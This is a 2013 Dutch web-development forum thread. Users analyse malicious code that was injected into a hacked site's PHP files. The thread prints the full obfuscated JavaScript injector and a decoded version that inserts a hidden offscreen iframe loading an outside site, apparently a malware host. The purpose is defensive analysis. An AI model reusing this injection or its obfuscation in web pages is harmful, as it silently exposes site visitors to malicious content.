[JS] Website gehackt. Wat doet deze code? - Softwareontwikkeling

woensdag 11 september 2013 13:16

Acties:

Topicstarter

De website van een vriend van mij is gehackt.
Aan een aantal .php-bestanden is onderstaande code toegevoegd.
Kan iemand ontcijferen wat dit precies doet?

PHP:

1
2

 
<?php echo "<script>if(document.querySelector)her=4;bqqpbq=(\"2c,2c,8c,89,43,4b,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,4c,9e,30,2c,2c,2c,8c,89,95,84,90,88,95,4b,4c,5e,30,2c,2c,a0,43,88,8f,96,88,43,9e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,9a,95,8c,97,88,4b,45,5f,8c,89,95,84,90,88,43,96,95,86,60,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,43,9a,8c,87,97,8b,60,4a,54,53,53,4a,43,8b,88,8c,8a,8b,97,60,4a,54,53,53,4a,43,96,97,9c,8f,88,60,4a,9a,8c,87,97,8b,5d,54,53,53,93,9b,5e,8b,88,8c,8a,8b,97,5d,54,53,53,93,9b,5e,93,92,96,8c,97,8c,92,91,5d,84,85,96,92,8f,98,97,88,5e,8f,88,89,97,5d,50,54,53,53,53,53,93,9b,5e,97,92,93,5d,53,5e,4a,61,5f,52,8c,89,95,84,90,88,61,45,4c,5e,30,2c,2c,a0,30,2c,2c,89,98,91,86,97,8c,92,91,43,8c,89,95,84,90,88,95,4b,4c,9e,30,2c,2c,2c,99,84,95,43,89,43,60,43,87,92,86,98,90,88,91,97,51,86,95,88,84,97,88,68,8f,88,90,88,91,97,4b,4a,8c,89,95,84,90,88,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,96,95,86,4a,4f,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,4c,5e,89,51,96,97,9c,8f,88,51,8f,88,89,97,60,4a,50,54,53,53,53,53,93,9b,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,97,9c,8f,88,51,93,92,96,8c,97,8c,92,91,60,4a,84,85,96,92,8f,98,97,88,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,9a,8c,87,97,8b,4a,4f,4a,54,53,53,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,8b,88,8c,8a,8b,97,4a,4f,4a,54,53,53,4a,4c,5e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,51,84,93,93,88,91,87,66,8b,8c,8f,87,4b,89,4c,5e,30,2c,2c,a0\".split(\",\"));jok=eval;function txqq(){pwwth=function(){--(ukl.body)}()}ukl=document;for(ciiq=0;ciiq<bqqpbq[\"length\"];ciiq+=1){bqqpbq[ciiq]=-(35)+parseInt(bqqpbq[ciiq],her*4);}try{txqq()}catch(ywcj){bjjyi=50-50;}if(!bjjyi)jok(String[\"fr\"+\"omCh\"+\"arCo\"+\"de\"].apply(String,bqqpbq));</script>"; ?>

Ik heb het een beetje proberen op te schonen tot dit:

PHP:

if(document.querySelector) her=4;
bqqpbq=("2c,2c,8c,89,43,4b,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,4c,9e,30,2c,2c,2c,8c,89,95,84,90,88,95,4b,4c,5e,30,2c,2c,a0,43,88,8f,96,88,43,9e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,9a,95,8c,97,88,4b,45,5f,8c,89,95,84,90,88,43,96,95,86,60,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,43,9a,8c,87,97,8b,60,4a,54,53,53,4a,43,8b,88,8c,8a,8b,97,60,4a,54,53,53,4a,43,96,97,9c,8f,88,60,4a,9a,8c,87,97,8b,5d,54,53,53,93,9b,5e,8b,88,8c,8a,8b,97,5d,54,53,53,93,9b,5e,93,92,96,8c,97,8c,92,91,5d,84,85,96,92,8f,98,97,88,5e,8f,88,89,97,5d,50,54,53,53,53,53,93,9b,5e,97,92,93,5d,53,5e,4a,61,5f,52,8c,89,95,84,90,88,61,45,4c,5e,30,2c,2c,a0,30,2c,2c,89,98,91,86,97,8c,92,91,43,8c,89,95,84,90,88,95,4b,4c,9e,30,2c,2c,2c,99,84,95,43,89,43,60,43,87,92,86,98,90,88,91,97,51,86,95,88,84,97,88,68,8f,88,90,88,91,97,4b,4a,8c,89,95,84,90,88,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,96,95,86,4a,4f,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,4c,5e,89,51,96,97,9c,8f,88,51,8f,88,89,97,60,4a,50,54,53,53,53,53,93,9b,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,97,9c,8f,88,51,93,92,96,8c,97,8c,92,91,60,4a,84,85,96,92,8f,98,97,88,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,9a,8c,87,97,8b,4a,4f,4a,54,53,53,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,8b,88,8c,8a,8b,97,4a,4f,4a,54,53,53,4a,4c,5e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,51,84,93,93,88,91,87,66,8b,8c,8f,87,4b,89,4c,5e,30,2c,2c,a0".split(","));
jok=eval;
function txqq(){
    pwwth=function(){
        --(ukl.body)
    }
()
}
ukl=document;
for(ciiq=0; ciiq<bqqpbq["length\"]; ciiq+=1)
{
    bqqpbq[ciiq]=-(35)+parseInt(bqqpbq[ciiq],her*4);
}
try{txqq()}
catch(ywcj)
{
    bjjyi=50-50;
}
if(!bjjyi) jok(String["fr"+"omCh"+"arCo"+"de"].apply(String,bqqpbq));

woensdag 11 september 2013 13:30

Acties:

DanielG

i = 0x5f3759df - (i>>1); ☠₧ℳ🀪❣

ik heb het een beetje herschreven naar dit:

JavaScript:

bqqpbq=("2c,2c,8c,89,43,4b,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,4c,9e,30,2c,2c,2c,8c,89,95,84,90,88,95,4b,4c,5e,30,2c,2c,a0,43,88,8f,96,88,43,9e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,9a,95,8c,97,88,4b,45,5f,8c,89,95,84,90,88,43,96,95,86,60,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,43,9a,8c,87,97,8b,60,4a,54,53,53,4a,43,8b,88,8c,8a,8b,97,60,4a,54,53,53,4a,43,96,97,9c,8f,88,60,4a,9a,8c,87,97,8b,5d,54,53,53,93,9b,5e,8b,88,8c,8a,8b,97,5d,54,53,53,93,9b,5e,93,92,96,8c,97,8c,92,91,5d,84,85,96,92,8f,98,97,88,5e,8f,88,89,97,5d,50,54,53,53,53,53,93,9b,5e,97,92,93,5d,53,5e,4a,61,5f,52,8c,89,95,84,90,88,61,45,4c,5e,30,2c,2c,a0,30,2c,2c,89,98,91,86,97,8c,92,91,43,8c,89,95,84,90,88,95,4b,4c,9e,30,2c,2c,2c,99,84,95,43,89,43,60,43,87,92,86,98,90,88,91,97,51,86,95,88,84,97,88,68,8f,88,90,88,91,97,4b,4a,8c,89,95,84,90,88,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,96,95,86,4a,4f,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,4c,5e,89,51,96,97,9c,8f,88,51,8f,88,89,97,60,4a,50,54,53,53,53,53,93,9b,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,97,9c,8f,88,51,93,92,96,8c,97,8c,92,91,60,4a,84,85,96,92,8f,98,97,88,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,9a,8c,87,97,8b,4a,4f,4a,54,53,53,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,8b,88,8c,8a,8b,97,4a,4f,4a,54,53,53,4a,4c,5e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,51,84,93,93,88,91,87,66,8b,8c,8f,87,4b,89,4c,5e,30,2c,2c,a0".split(",")); 

solved="";

for(ciiq=0; ciiq<bqqpbq["length"]; ciiq+=1) 
{ 
    solved+=String.fromCharCode(-(35)+parseInt(bqqpbq[ciiq],16));
} 
console.log(solved);

wat dan het volgende geeft als 'solved':

JavaScript:

if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            document.write("<iframe src='http://itmagnate.org/' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
        }
        function iframer(){
            var f = document.createElement('iframe');f.setAttribute('src','http://itmagnate.org/');f.style.left='-10000px';f.style.top='0';f.style.pos&#8230;f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
            document.getElementsByTagName('body')[0].appendChild(f);
        }

Dus wat het doet is een iframe maken naar een URL die waarschijnlijk gevaarlijk is.

Trouwens als je googlet op "2c,2c,8c,89,43,4b," zie je redelijk wat nederlandse hosts die hier last van hebben.

http://xyproblem.info/

woensdag 11 september 2013 13:49

Acties:

MarkII

Topicstarter

Aha, dankjewel.

Ik had wel gezocht met een stukje code, maar toen vond ik alleen een tafeltennisvereniging.

Ik zie ook Zwitserse en Deense sites.
Dat zijn drukke baasje geweest.
Zeker een achterdeurtje gevonden?

woensdag 11 september 2013 14:05

Acties:

Ploink

Oeps!
Exploit aangeboden door GoT topic
DIT topic dus, sommige virus scanners klagen over de code die gepost is.